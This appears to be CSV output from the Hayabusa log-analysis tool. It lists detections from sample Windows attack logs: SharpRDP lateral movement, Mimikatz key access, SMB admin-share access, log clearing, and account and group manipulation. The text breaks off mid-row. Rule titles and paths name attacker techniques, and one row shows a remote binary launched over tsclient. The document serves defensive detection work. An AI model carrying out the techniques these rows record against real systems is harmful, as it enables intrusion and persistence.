07:00:14.195 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:28.307 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:28.458 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:31.218 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:42.919 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:43.042 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\windows\system32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:01.154 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:01.337 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.899 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.900 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.902 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:02:42.085 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:07.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:14.112 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:14.229 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:20.184 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:07:33.800 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: rdpclip : Path: C:\Windows\System32\rdpclip.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\svchost.exe -k NetworkService -s TermService,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:35.886 
+09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:35.913 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""\\tsclient\c\temp\stack\a.exe"" : Path: \\tsclient\c\temp\stack\a.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:58.942 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-11 22:21:11.693 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:11.693 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:17.514 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:17.514 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:18.640 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:18.640 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx -2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx -2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx -2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx -2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx -2020-07-12 02:18:01.228 
+09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx -2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx -2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx -2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx -2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx -2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,medium,Local user account created,User: hacking-local-acct : 
SID:S-1-5-21-1470532092-3758209836-3742276719-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx -2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx -2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx -2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx -2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02 : Subject user: lambda-user : Subject domain: 
OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx -2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group01",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group01 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: 
S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: 
CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group05",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group05 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.572 
+09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: 